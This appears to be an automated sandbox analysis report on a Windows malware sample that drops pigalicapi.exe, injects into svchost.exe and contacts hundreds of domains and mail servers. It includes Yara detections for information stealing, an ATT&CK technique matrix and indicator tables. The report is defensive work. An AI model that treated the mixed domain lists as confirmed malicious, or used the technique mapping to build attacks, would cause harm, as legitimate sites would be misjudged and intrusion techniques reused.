                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,4_2_00EC8F80

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.ec0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.1500000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CX17SY6xF6.exe.d60000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.1500000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CX17SY6xF6.exe.d60000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.863723197.0000000001500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.860363475.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts3
                  Native API
                  1
                  Windows Service
                  1
                  Windows Service
                  111
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  Exfiltration Over Other Network Medium21
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                  Data Encrypted for Impact
                  Default AccountsScheduled Task/Job1
                  Registry Run Keys / Startup Folder
                  511
                  Process Injection
                  21
                  Virtualization/Sandbox Evasion
                  LSASS Memory231
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)1
                  Registry Run Keys / Startup Folder
                  511
                  Process Injection
                  Security Account Manager21
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Obfuscated Files or Information
                  NTDS2
                  Process Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer25
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                  Remote System Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  File and Directory Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow25
                  System Information Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1281452 Sample: CX17SY6xF6.exe Startdate: 27/07/2023 Architecture: WINDOWS Score: 100 61 rast.se 2->61 63 kustnara.com 2->63 65 307 other IPs or domains 2->65 101 Snort IDS alert for network traffic 2->101 103 Multi AV Scanner detection for domain / URL 2->103 105 Antivirus detection for URL or domain 2->105 111 4 other signatures 2->111 8 pigalicapi.exe 48 2->8         started        12 CX17SY6xF6.exe 3 68 2->12         started        15 pigalicapi.exe 48 2->15         started        signatures3 107 System process connects to network (likely due to code injection or exploit) 63->107 109 Tries to resolve many domain names, but no domain seems valid 63->109 process4 dnsIp5 67 www.fnw.us 8->67 75 148 other IPs or domains 8->75 113 Multi AV Scanner detection for dropped file 8->113 115 Detected unpacking (creates a PE file in dynamic memory) 8->115 117 Machine Learning detection for dropped file 8->117 129 4 other signatures 8->129 17 svchost.exe 8->17         started        69 skypearl.com 12->69 71 juso-gr.ch 12->71 77 192 other IPs or domains 12->77 45 C:\Users\user\pigalicapi.exe, PE32 12->45 dropped 47 C:\Users\...\pigalicapi.exe:Zone.Identifier, ASCII 12->47 dropped 119 Drops PE files to the user root directory 12->119 21 svchost.exe 12->21         started        23 svchost.exe 12->23         started        73 www.domon.com 15->73 79 151 other IPs or domains 15->79 121 Writes to foreign memory regions 15->121 123 Injects a PE file into a foreign processes 15->123 25 svchost.exe 15->25         started        file6 125 System process connects to network (likely due to code injection or exploit) 71->125 127 Tries to resolve many domain names, but no domain seems valid 73->127 signatures7 process8 dnsIp9 49 smtp.mail.global.gm0.yahoodns.net 17->49 51 smtp.mail.yahoo.com 17->51 53 nt-hat.com 17->53 27 svchost.exe 17->27         started        31 svchost.exe 17->31         started        33 svchost.exe 17->33         started        35 svchost.exe 17->35         started        55 smtp1.sbc.mail.am0.yahoodns.net 21->55 57 smtp.mail.global.gm0.yahoodns.net 21->57 59 5 other IPs or domains 21->59 95 System process connects to network (likely due to code injection or exploit) 21->95 97 Contains functionality to inject threads in other processes 21->97 99 Injects a PE file into a foreign processes 21->99 37 svchost.exe 2 12 21->37         started        39 svchost.exe 12 21->39         started        41 svchost.exe 21->41         started        43 svchost.exe 21->43         started        signatures10 process11 dnsIp12 83 12 other IPs or domains 27->83 85 2 other IPs or domains 31->85 87 87 other IPs or domains 37->87 131 System process connects to network (likely due to code injection or exploit) 37->131 89 77 other IPs or domains 39->89 91 68 other IPs or domains 41->91 81 c-drop.net 43->81 93 310 other IPs or domains 43->93 signatures13 133 Tries to resolve many domain names, but no domain seems valid 81->133

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  CX17SY6xF6.exe29%ReversingLabs
                  CX17SY6xF6.exe35%VirustotalBrowse
                  CX17SY6xF6.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\pigalicapi.exe100%Joe Sandbox ML
                  C:\Users\user\pigalicapi.exe29%ReversingLabs
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  holp-ai.com2%VirustotalBrowse
                  impexnc.com0%VirustotalBrowse
                  webways.com8%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://www.c9dd.com/C#i((0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-600x338.jpg0%Avira URL Cloudsafe
                  https://www.stajerskagz.si/o-sgz-2/0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.00%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/js/form.class.js0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/fonts/DejaVu-Sans/stylesheet.css0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/0%Avira URL Cloudsafe
                  https://pohlfood.com/#website0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.500%Avira URL Cloudsafe
                  http://a-domani.com/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/0%Avira URL Cloudsafe
                  https://inhouse.pohlfood.com/0%Avira URL Cloudsafe
                  https://www.pcgrate.com/#webpage0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-64x36.jpg0%Avira URL Cloudsafe
                  http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.10%Avira URL Cloudsafe
                  http://gpthink.com/product/204.html100%Avira URL Cloudmalware
                  https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-600x599.jpg0%Avira URL Cloudsafe
                  http://www.quadlock.com/Sb0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/0%Avira URL Cloudsafe
                  http://www.stajum.com/N100%Avira URL Cloudmalware
                  http://www.elpro.si/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.0%Avira URL Cloudsafe
                  https://www.pwd.org/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver0%Avira URL Cloudsafe
                  http://www.credo.edu.pl/m100%Avira URL Cloudmalware
                  https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/0%Avira URL Cloudsafe
                  http://www.credo.edu.pl/100%Avira URL Cloudmalware
                  https://www.elpro.si/avtorji/0%Avira URL Cloudsafe
                  http://www.stajum.com/V100%Avira URL Cloudmalware
                  https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/0%Avira URL Cloudsafe
                  http://sigtoa.com/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130104085305_100_0645_105x0-aspect-wr.J0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-100x100.jpg0%Avira URL Cloudsafe
                  https://www.aevga.com/100%Avira URL Cloudmalware
                  https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/0%Avira URL Cloudsafe
                  https://pohlfood.com/comments/feed/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.250%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/0%Avira URL Cloudsafe
                  http://www.naoi-a.com/0%Avira URL Cloudsafe
                  http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
                  http://www.pwd.org/h0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/js/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                  http://www.valselit.com/177-appartement-a-vendre-sigean-30378100%Avira URL Cloudmalware
                  http://www.abdg.com/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
                  http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
                  http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/modules/contentDisplay/contentDisplay.mod.css0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen0%Avira URL Cloudsafe
                  http://calvinly.com/0%Avira URL Cloudsafe
                  http://gholographic.com/0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
                  https://www.ora-ito.com/0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.22/Museumsuferfest-2013-23.-25.08.2013.html0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.00%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/0%Avira URL Cloudsafe
                  https://tickets.suresupport.com/faq/article-1596/en0%Avira URL Cloudsafe
                  http://zugseil.com/0%Avira URL Cloudsafe
                  https://www.lrsuk.com/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.00%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/0%Avira URL Cloudsafe
                  http://myropcb.com/login/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.90%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/0%Avira URL Cloudsafe
                  http://www.credo.edu.pl/0100%Avira URL Cloudmalware
                  https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  holp-ai.com
                  59.106.13.169
                  truetrueunknown
                  impexnc.com
                  204.11.56.48
                  truetrueunknown
                  webways.com
                  188.114.96.7
                  truetrueunknown
                  www.fcwcvt.org
                  188.114.96.7
                  truetrue
                    unknown
                    dayvo.com
                    188.114.96.7
                    truetrue
                      unknown
                      hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                      3.130.204.160
                      truefalse
                        high
                        enguita.net
                        195.5.116.23
                        truetrue
                          unknown
                          dataform.co.uk
                          83.223.113.46
                          truetrue
                            unknown
                            shteeble.com
                            185.106.129.180
                            truetrue
                              unknown
                              evcpa.com
                              192.124.249.10
                              truefalse
                                unknown
                                shittas.com
                                208.91.197.46
                                truetrue
                                  unknown
                                  kallman.net
                                  185.76.64.25
                                  truetrue
                                    unknown
                                    bible.org
                                    172.67.33.95
                                    truefalse
                                      high
                                      missnue.com
                                      104.21.234.121
                                      truetrue
                                        unknown
                                        gphpedit.org
                                        127.0.0.1
                                        truetrue
                                          unknown
                                          jsaps.com
                                          49.212.235.59
                                          truetrue
                                            unknown
                                            avse.hu
                                            185.129.138.60
                                            truetrue
                                              unknown
                                              pohlfood.com
                                              104.218.10.254
                                              truefalse
                                                unknown
                                                notis.ru
                                                185.178.208.141
                                                truetrue
                                                  unknown
                                                  canasil.com
                                                  104.26.3.14
                                                  truetrue
                                                    unknown
                                                    www.jenco.co.uk
                                                    172.67.208.67
                                                    truefalse
                                                      unknown
                                                      www.tyrns.com
                                                      62.75.216.137
                                                      truefalse
                                                        unknown
                                                        nts-web.net
                                                        49.212.235.175
                                                        truetrue
                                                          unknown
                                                          willsub.com
                                                          69.89.107.122
                                                          truefalse
                                                            high
                                                            ldh.la.gov
                                                            75.2.95.235
                                                            truefalse
                                                              high
                                                              shesfit.com
                                                              188.114.96.7
                                                              truetrue
                                                                unknown
                                                                www.vexcom.com
                                                                104.21.55.224
                                                                truefalse
                                                                  unknown
                                                                  cpmteam.com
                                                                  188.114.97.7
                                                                  truefalse
                                                                    high
                                                                    tcpoa.com
                                                                    164.90.244.158
                                                                    truetrue
                                                                      unknown
                                                                      kevyt.net
                                                                      172.67.129.18
                                                                      truetrue
                                                                        unknown
                                                                        www.mobilnic.net
                                                                        154.203.14.100
                                                                        truefalse
                                                                          unknown
                                                                          s5w.com
                                                                          192.99.226.184
                                                                          truetrue
                                                                            unknown
                                                                            www.sclover3.com
                                                                            157.112.182.239
                                                                            truefalse
                                                                              unknown
                                                                              in1.smtp.messagingengine.com
                                                                              103.168.172.216
                                                                              truetrue
                                                                                unknown
                                                                                paraski.org
                                                                                94.130.164.242
                                                                                truetrue
                                                                                  unknown
                                                                                  dog-jog.net
                                                                                  153.122.24.177
                                                                                  truetrue
                                                                                    unknown
                                                                                    kamptal.at
                                                                                    128.204.134.138
                                                                                    truetrue
                                                                                      unknown
                                                                                      bd-style.com
                                                                                      103.112.69.92
                                                                                      truetrue
                                                                                        unknown
                                                                                        ora.ecnet.jp
                                                                                        60.43.154.138
                                                                                        truefalse
                                                                                          high
                                                                                          adventist.ro
                                                                                          49.12.155.123
                                                                                          truetrue
                                                                                            unknown
                                                                                            www.edimart.hu
                                                                                            81.2.194.241
                                                                                            truefalse
                                                                                              unknown
                                                                                              zupraha.cz
                                                                                              77.78.104.3
                                                                                              truetrue
                                                                                                unknown
                                                                                                isom.org
                                                                                                192.124.249.14
                                                                                                truetrue
                                                                                                  unknown
                                                                                                  any-s.net
                                                                                                  108.170.12.50
                                                                                                  truetrue
                                                                                                    unknown
                                                                                                    muhr-soehne.de
                                                                                                    5.189.171.125
                                                                                                    truetrue
                                                                                                      unknown
                                                                                                      www.railbook.net
                                                                                                      103.224.212.221
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                                                                                        54.161.222.85
                                                                                                        truefalse
                                                                                                          high
                                                                                                          oaith.ca
                                                                                                          192.124.249.12
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            shztm.ru
                                                                                                            62.122.170.171
                                                                                                            truetrue
                                                                                                              unknown
                                                                                                              akr.co.id
                                                                                                              104.20.123.68
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                www.abdg.com
                                                                                                                192.252.154.18
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  www.spanesi.com
                                                                                                                  5.196.166.214
                                                                                                                  truetrue
                                                                                                                    unknown
                                                                                                                    aiolos-sa.gr
                                                                                                                    188.114.96.7
                                                                                                                    truetrue
                                                                                                                      unknown
                                                                                                                      usadig.com
                                                                                                                      198.100.146.220
                                                                                                                      truetrue
                                                                                                                        unknown
                                                                                                                        metaforacom.com
                                                                                                                        185.42.105.162
                                                                                                                        truetrue
                                                                                                                          unknown
                                                                                                                          dhh.la.gov
                                                                                                                          52.200.51.73
                                                                                                                          truefalse
                                                                                                                            high
                                                                                                                            gmail-smtp-in.l.google.com
                                                                                                                            142.250.27.26
                                                                                                                            truefalse
                                                                                                                              high
                                                                                                                              fdlymca.org
                                                                                                                              192.124.249.9
                                                                                                                              truetrue
                                                                                                                                unknown
                                                                                                                                smtp1.sbc.mail.am0.yahoodns.net
                                                                                                                                66.163.170.48
                                                                                                                                truetrue
                                                                                                                                  unknown
                                                                                                                                  assideum.com
                                                                                                                                  52.219.100.19
                                                                                                                                  truetrue
                                                                                                                                    unknown
                                                                                                                                    bidroll.com
                                                                                                                                    13.56.33.8
                                                                                                                                    truetrue
                                                                                                                                      unknown
                                                                                                                                      cbras.com
                                                                                                                                      54.39.198.18
                                                                                                                                      truetrue
                                                                                                                                        unknown
                                                                                                                                        atbauk.org
                                                                                                                                        172.67.196.145
                                                                                                                                        truetrue
                                                                                                                                          unknown
                                                                                                                                          www.vazir.se
                                                                                                                                          206.191.152.37
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            www.naoi-a.com
                                                                                                                                            202.254.236.40
                                                                                                                                            truefalse
                                                                                                                                              unknown
                                                                                                                                              d2r2uj0bnofxxz.cloudfront.net
                                                                                                                                              18.165.183.19
                                                                                                                                              truefalse
                                                                                                                                                high
                                                                                                                                                www.valselit.com
                                                                                                                                                193.70.68.254
                                                                                                                                                truetrue
                                                                                                                                                  unknown
                                                                                                                                                  vvsteknik.dk
                                                                                                                                                  185.31.76.90
                                                                                                                                                  truetrue
                                                                                                                                                    unknown
                                                                                                                                                    biosolve.com
                                                                                                                                                    151.101.130.159
                                                                                                                                                    truetrue
                                                                                                                                                      unknown
                                                                                                                                                      karmy.com.pl
                                                                                                                                                      185.253.212.22
                                                                                                                                                      truetrue
                                                                                                                                                        unknown
                                                                                                                                                        www.fe-bauer.de
                                                                                                                                                        3.65.101.129
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          smtp.mail.global.gm0.yahoodns.net
                                                                                                                                                          87.248.97.36
                                                                                                                                                          truetrue
                                                                                                                                                            unknown
                                                                                                                                                            vdoherty.com
                                                                                                                                                            91.216.241.100
                                                                                                                                                            truetrue
                                                                                                                                                              unknown
                                                                                                                                                              hbfuels.com
                                                                                                                                                              85.233.160.146
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                td-ccm-neg-87-45.wixdns.net
                                                                                                                                                                34.149.87.45
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  pb-games.com
                                                                                                                                                                  173.254.28.29
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    mackusick.de
                                                                                                                                                                    217.160.0.131
                                                                                                                                                                    truetrue
                                                                                                                                                                      unknown
                                                                                                                                                                      ncn.de
                                                                                                                                                                      46.30.60.158
                                                                                                                                                                      truetrue
                                                                                                                                                                        unknown
                                                                                                                                                                        nekono.net
                                                                                                                                                                        202.172.28.187
                                                                                                                                                                        truetrue
                                                                                                                                                                          unknown
                                                                                                                                                                          cvswl.org
                                                                                                                                                                          188.114.97.7
                                                                                                                                                                          truefalse
                                                                                                                                                                            high
                                                                                                                                                                            fnw.us
                                                                                                                                                                            137.118.26.67
                                                                                                                                                                            truefalse
                                                                                                                                                                              high
                                                                                                                                                                              komie.com
                                                                                                                                                                              59.106.13.181
                                                                                                                                                                              truefalse
                                                                                                                                                                                high
                                                                                                                                                                                ftmobile.com
                                                                                                                                                                                199.34.228.78
                                                                                                                                                                                truefalse
                                                                                                                                                                                  high
                                                                                                                                                                                  www.x0c.com
                                                                                                                                                                                  104.143.9.110
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    onzcda.com
                                                                                                                                                                                    15.197.204.56
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      high
                                                                                                                                                                                      sledsport.ru
                                                                                                                                                                                      185.22.232.175
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        high
                                                                                                                                                                                        www.findbc.com
                                                                                                                                                                                        13.248.169.48
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          high
                                                                                                                                                                                          tbvlugus.nl
                                                                                                                                                                                          174.129.25.170
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            high
                                                                                                                                                                                            cubodown.com
                                                                                                                                                                                            104.21.30.14
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              high
                                                                                                                                                                                              infotech.pl
                                                                                                                                                                                              79.96.32.254
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                pellys.co.uk
                                                                                                                                                                                                77.72.4.226
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  semuk.com
                                                                                                                                                                                                  86.105.245.69
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    tozzhin.com
                                                                                                                                                                                                    202.94.166.30
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      tabbles.net
                                                                                                                                                                                                      80.211.41.39
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        cqdgroup.com
                                                                                                                                                                                                        221.132.33.88
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          www.muhr-soehne.de
                                                                                                                                                                                                          5.189.171.125
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            fortknox.bm
                                                                                                                                                                                                            216.177.137.32
                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              camamat.com
                                                                                                                                                                                                              104.21.235.31
                                                                                                                                                                                                              truefalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                mail.airmail.net
                                                                                                                                                                                                                66.226.70.66
                                                                                                                                                                                                                truefalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  lyto.net
                                                                                                                                                                                                                  188.114.96.7
                                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                    http://a-domani.com/true
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.elpro.si/false
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.credo.edu.pl/false
                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://sigtoa.com/true
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://dhh.la.gov/false
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://www.naoi-a.com/false
                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://www.abdg.com/false
                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://msl-lock.com/false
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://ldh.la.gov/false
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://calvinly.com/false
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://zugseil.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                          https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-600x338.jpgCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
